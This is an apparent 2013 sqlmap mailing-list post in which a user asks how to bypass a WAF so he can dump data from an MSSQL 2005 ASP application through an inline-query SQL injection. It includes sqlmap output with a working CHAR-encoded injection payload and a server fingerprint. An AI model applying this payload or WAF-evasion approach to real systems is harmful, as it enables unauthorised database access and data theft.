[sqlmap-users] Tricky Injection - Mssql 2005 w/ robust Waf
From: Matheus V. <mat...@gm...> - 2013-02-25 19:38:42
Hello!

I'm testing an ASP application running under MSSQL 2005 that is vulnerable to Microsoft SQL Server/Sybase inline queries, but I'm unable to detect the name of the database and this is preventing me from dumping data from it.

I've already got some table names using '--common-tables', but no matter what tamper/tamper combination I use, I cannot dump.

Can someone share any thoughts?

Thanks a lot!

Matheus.

Here is a sample of an HTTP request:
___

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: xxxx
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: xxxx=(SELECT CHAR(58)+CHAR(109)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (9983=9983) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(97)+CHAR(122)+CHAR(58))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

Database: All
Table: dbo.xxxx
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| user   | non-numeric |
+--------+-------------+